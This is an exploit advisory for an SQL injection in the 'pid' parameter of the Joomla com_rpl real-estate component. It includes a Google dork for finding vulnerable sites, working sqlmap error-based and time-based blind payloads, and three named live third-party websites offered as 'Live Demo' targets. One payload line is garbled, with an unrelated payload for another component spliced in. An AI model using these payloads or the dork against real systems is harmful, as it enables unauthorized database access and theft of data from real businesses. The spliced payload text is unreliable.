Joomla com_rpl SQL injection Vulnerability

Published
Credit
Risk
2016.12.17
xBADGIRL21
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes
Dork: inurl:index.php?option=com_rpl

##############################
# [xBADGIRL21] #
# [N3W PUBLIC 3XPL0IT] #
# _,________ #
# 0day _T _==____() -- #
# /##(_)-' #
# /##/ #
# x21 #
##############################
# Exploit Title : Joomla com_rpl SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_rpl
# Vendor Homepage : https://www.realtyna.com
# version : ALL
# Tested on: [ BACKBOX]
# MyBlog : http://xbadgirl21.blogspot.com/
# Date: 15/12/2016
# video Proof : https://www.youtube.com/watch?v=jlZ1gOM9KSk
[*] To buy or Danate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz
######################
# [+] DESCRIPTION :
######################
# [+] Realtyna CRM (Client Relationship Management) Add-on
# [+] for RPL is a Real Estate CRM specially designed and developed
# [+] based on business process and models required by Real Estate
# [+] AND an SQL injection has been Detected in this Joomla components realtyna
######################
# [+] Poc :
######################
# [pid] Get Parameter Vulnerable To SQLi
# http://127.0.0.1/index.php?option=com_rpl&view=propertyshow&pid=[SQLi]&Itemid=
######################
# [+] SQLmap PoC:
######################
# Parameter: pid (GET)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: option=com_rpl&view=propertyshow&pid=31825' AND (SELECT 4394 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(4394=4394,1))),0x7162767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qozi&Itemid=
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: option=com_rpl&view=propertyshow&pid=31825' AND SLEEP(5)-- XXKX&Itemid=load: option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021 AND (SELECT 8657 FROM(SELECT #COUNT(*),CONCAT(0x71767a7171,(SELECT (ELT(8657=8657,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
# ---
# GET parameter 'pid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
######################
# [!] Live Demo :
######################
# http://www.myproperty.ae/index.php?option=com_rpl&view=propertyshow&pid=31825&Itemid=
# http://primerealty.co.th/index.php?option=com_rpl&view=propertyshow&pid=3&Itemid
# http://www.eprop.co.za/index.php?option=com_rpl&view=propertyshow&pid=31333&Itemid=
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################

References:

https://www.youtube.com/watch?v=jlZ1gOM9KSk


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com